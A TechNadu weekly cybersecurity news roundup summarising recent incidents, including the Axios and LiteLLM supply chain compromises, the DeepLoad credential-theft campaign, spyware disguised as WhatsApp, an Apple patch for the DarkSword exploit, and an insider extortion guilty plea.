Home > Security > Security News

Weekly Cybersecurity News: Increased Focus on Supply Chain And Credentials To Expand Access

Published
Written by:
Vishwa Pandagle
Vishwa Pandagle
Cybersecurity Staff Editor
Target - Attack - Dart - Cloud - Infrastructure - City - State - Systems
Summarize with:
ChatGPT logo ChatGPT Claude.ai logo Claude.ai Google AI logo Google AI Grok logo Grok Perplexity logo Perplexity
Google logo Add as preferred source on Google

This week’s cybersecurity activity shows a clear focus on gaining access and visibility inside systems, with supply chain attacks, credential theft, and spyware. 

From fileless malware to phishing, threat actors are targeting developer environments, enterprise data, and conducting targeted attacks. Incidents point to the exploitation of trusted platforms and third-party services, allowing access while reducing detection.

Small Businesses Increase AI Use Amid Planning Gaps

A report based on a survey of 400 U.S. small business leaders found that 62% of SMBs use Artificial Intelligence in daily operations. It shows that 67% expect their AI usage to grow over the next year. Many businesses see AI as a way to compete with larger companies. However, gaps in planning and internal alignment are affecting how it is implemented. Many SMBs are turning to external experts to support secure and effective AI deployment. The report also shows that 84% of SMBs are willing to rely on external advisors for implementation, reflecting a strong dependence on outside expertise.

Axios Supply Chain Attack Infects npm Packages

A supply chain attack targeting the Axios JavaScript library was confirmed after threat actors compromised the npm account of a core maintainer and published malicious package versions. The attackers injected a rogue dependency, [email protected], into Axios versions 1.14.1 and 0.30.4, which executed a postinstall script upon installation. This script deployed a cross-platform remote access trojan capable of running on macOS, Windows, and Linux systems. The malware established communication with a command-and-control server to fetch platform-specific payloads and execute them on infected environments. After execution, it removed traces by deleting itself.

DeepLoad Malware Campaign Deploys Credential Theft Payload

A new malware campaign uses the ClickFix social engineering technique to trick users into executing malicious PowerShell commands, enabling initial access to enterprise systems. The attack chain relies on mshta.exe to download an obfuscated loader that executes primarily in memory, reducing detection by traditional security tools. Once deployed, the DeepLoad malware establishes persistence using Windows Management Instrumentation mechanisms that can trigger reinfection even after apparent remediation. The payload performs credential theft by capturing stored passwords and active user sessions, continuing even if the primary loader is blocked. Researchers indicate the malware likely uses AI-assisted obfuscation.

LiteLLM Supply Chain Attack Spreads Malware Across AI Ecosystem

A supply chain attack compromised the widely used LiteLLM Python library, allowing attackers to distribute credential-stealing malware through malicious package versions. Security researchers confirmed that versions 1.82.7 and 1.82.8 contained hidden payloads designed to harvest sensitive data such as API keys, SSH credentials, and cloud tokens from affected systems. The breach was traced to a broader campaign linked to the TeamPCP threat group, which previously targeted tools like the Trivy security scanner to obtain privileged access. Because LiteLLM is deeply embedded in many AI development stacks, the malicious code reached thousands of environments without direct installation.

End Of The Line: NSW Police Crack $80 Million Dark Web Drug Empire

A long-running online drug operation worth millions has been dismantled by Australian police, exposing a hidden network that operated in plain sight on the internet. Investigators traced how drugs were sold through secretive online platforms, allowing transactions to happen without physical contact. A 38-year-old suspect was arrested in Sydney, and raids uncovered cash, narcotics, and devices linked to the operation. The case shows how digital tools can be exploited to run illegal businesses at scale while staying out of view. For everyday people, it highlights that these underground markets are not as untouchable as they may seem. Authorities have charged multiple individuals and are continuing to examine digital evidence to identify others involved.

Malicious Code Found in Axios Library Compromise

A widely used software library relied on by developers worldwide has been compromised, which exposed systems to hidden malware in updates. Attackers gained access to a maintainer’s account and inserted a malicious component into Axios, which is commonly used to handle internet requests in applications. Once installed, the malware enabled unauthorized access, allowing attackers to run commands and extract sensitive system data without detection. The threat was designed to be especially stealthy, removing itself after execution and restoring clean files to avoid raising alarms. Given Axios’ massive usage across modern apps and services, the impact potentially extends to a vast number of organizations and users.

WhatsApp Spyware Alert: Fake App Targets Users In Italy

WhatsApp has warned around 200 users, mostly in Italy, after discovering a malicious iOS app disguised as its official platform. The fake application was designed to infiltrate devices and extract sensitive data without users realizing the breach. Affected users were logged out of their accounts immediately to stop further data access and were notified about the risks. The spyware appears to have been distributed outside official app stores, increasing the likelihood of targeted delivery rather than mass spread. The incident adds to a pattern of spyware campaigns using fake apps to compromise devices and monitor communications.

Cisco Reviews Security Incident Following Claims Linked To Trivy Exposure

Cisco is examining reports of a security incident after threat actors claimed access to internal systems and sensitive data. The claims suggest that exposed credentials tied to a third-party Trivy dependency may have enabled unauthorized entry into development environments. Such supply chain issues can lead to access to cloud resources, repositories, and internal tools if not contained quickly. The alleged data includes references to Salesforce records and cloud assets, though the full scope remains unverified. Investigations are ongoing, with no confirmed statement detailing the extent of impact or data exposure. The situation highlights the continued scrutiny of software supply chains and credential management.

Apple Issues Security Update For Older Devices To Address Web-Based Exploit Risks

Apple has released iOS 18.7.7 and iPadOS 18.7.7 to address a critical vulnerability affecting older iPhones and iPads. The issue is tied to a web-based exploit framework known as DarkSword, which can be triggered when users visit compromised websites. Security researchers indicate that such exploits can access sensitive data including messages, location details, and digital assets. The update is aimed at users who have not transitioned to newer iOS versions, ensuring continued protection for legacy devices. Reports suggest that the exploit toolkit, once limited in scope, may now pose broader risks following its exposure. Apple has advised users to update their devices promptly and consider additional protections such as Lockdown Mode.

Phishing Relying on GitHub for Stealthy System Intrusions

Security researchers have identified a phishing campaign targeting organizations in South Korea that uses deceptive shortcut files to initiate multi-stage intrusions. The attack chain begins with malicious LNK files that execute encoded PowerShell scripts while presenting decoy documents. Once triggered, the malware establishes persistence and collects system-level information from compromised environments. The operation uses GitHub as a command and control channel, allowing data transmission through legitimate encrypted connections. This approach helps the activity blend into normal network traffic.

Third-Party Breach Exposes Hims & Hers Customer Data

A cybersecurity incident affecting Hims & Hers led to the exposure of customer data after attackers compromised a third-party customer support platform. The breach occurred over several days in early February 2026 and was carried out using social engineering techniques to manipulate employees into granting unauthorized access. As a result, customer support tickets containing personally identifiable information such as names and email addresses were accessed and exfiltrated. The company confirmed that core medical records were not affected, though support interactions may still contain sensitive personal context. The incident was disclosed through a regulatory filing, highlighting risks tied to external vendor integrations in healthcare systems.

Employee Pleads Guilty In Hacking And Extortion Case

A former infrastructure engineer has pleaded guilty to hacking and attempting to extort a U.S.-based industrial company. According to court documents, he used his access to the company’s network to carry out unauthorized actions that disrupted operations. These actions included deleting administrator accounts, changing passwords, and shutting down multiple servers. After causing the disruption, he sent an email demanding approximately 20 bitcoin in exchange for restoring normal operations. The incident took place in November 2023 and was later investigated by U.S. authorities, leading to a guilty plea in federal court. The case involves charges related to intentional damage to a protected computer and extortion.

Supply Chain Attacks And Credential Theft Dominate Threat Activity

Attackers consistently used software supply chains, third-party platforms, and phishing techniques to obtain credentials and establish persistence. The activity shows a pattern of targeting developer tools, cloud access points, and communication platforms. 

Misuse of privileged access and insider threats continued to be addressed by law enforcement, while threat actors tricked support staff to gain unauthorized access to customer data.

Add a Comment
Related
Former Employee Pleads Guilty to Insider Hacking and Extortion of US Industrial Company
Hims & Hers Data Breach Exposes Customer Data via Compromise at Third-Party Customer Support Provider
Duales' Duc App Data Left Unprotected Due to Unencrypted Server, Over 360,000 Files Exposed
DPRK Phishing Campaigns Exploit GitHub C2 to Target Users in South Korea
Apple Security Fix Defends Devices From DarkSword iOS Exploit
Alleged Cisco Breach Linked to Trivy Supply Chain Compromise, ShinyHunters Claims 3 Million Salesforce Records
Most Popular
Former Employee Pleads Guilty to Insider Hacking and Extortion of US Industrial Company
Hims & Hers Data Breach Exposes Customer Data via Compromise at Third-Party Customer Support Provider
Duales' Duc App Data Left Unprotected Due to Unencrypted Server, Over 360,000 Files Exposed
DPRK Phishing Campaigns Exploit GitHub C2 to Target Users in South Korea
Apple Security Fix Defends Devices From DarkSword iOS Exploit
Alleged Cisco Breach Linked to Trivy Supply Chain Compromise, ShinyHunters Claims 3 Million Salesforce Records
Former Employee Pleads Guilty to Insider Hacking and Extortion of US Industrial Company
Hims & Hers Data Breach Exposes Customer Data via Compromise at Third-Party Customer Support Provider
Duales' Duc App Data Left Unprotected Due to Unencrypted Server, Over 360,000 Files Exposed
DPRK Phishing Campaigns Exploit GitHub C2 to Target Users in South Korea
Apple Security Fix Defends Devices From DarkSword iOS Exploit
Alleged Cisco Breach Linked to Trivy Supply Chain Compromise, ShinyHunters Claims 3 Million Salesforce Records

Most Popular
Former Employee Pleads Guilty to Insider Hacking and Extortion of US Industrial Company
Hims & Hers Data Breach Exposes Customer Data via Compromise at Third-Party Customer Support Provider
Duales' Duc App Data Left Unprotected Due to Unencrypted Server, Over 360,000 Files Exposed
DPRK Phishing Campaigns Exploit GitHub C2 to Target Users in South Korea
Apple Security Fix Defends Devices From DarkSword iOS Exploit
Alleged Cisco Breach Linked to Trivy Supply Chain Compromise, ShinyHunters Claims 3 Million Salesforce Records
Former Employee Pleads Guilty to Insider Hacking and Extortion of US Industrial Company
Hims & Hers Data Breach Exposes Customer Data via Compromise at Third-Party Customer Support Provider
Duales' Duc App Data Left Unprotected Due to Unencrypted Server, Over 360,000 Files Exposed
DPRK Phishing Campaigns Exploit GitHub C2 to Target Users in South Korea
Apple Security Fix Defends Devices From DarkSword iOS Exploit
Alleged Cisco Breach Linked to Trivy Supply Chain Compromise, ShinyHunters Claims 3 Million Salesforce Records

TechNadu keeps you informed with the latest in cybersecurity, VPNs, and technology. From expert guides to in-depth reviews, we provide the knowledge you need to stay secure and connected in the digital world.

© 2026 TechNadu. All Rights Reserved. TechNadu is a part of Leaprove Media LLP.

Close lightbox
Facebook
Twitter
Linkedin
Reddit
Email
Copy Link
For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: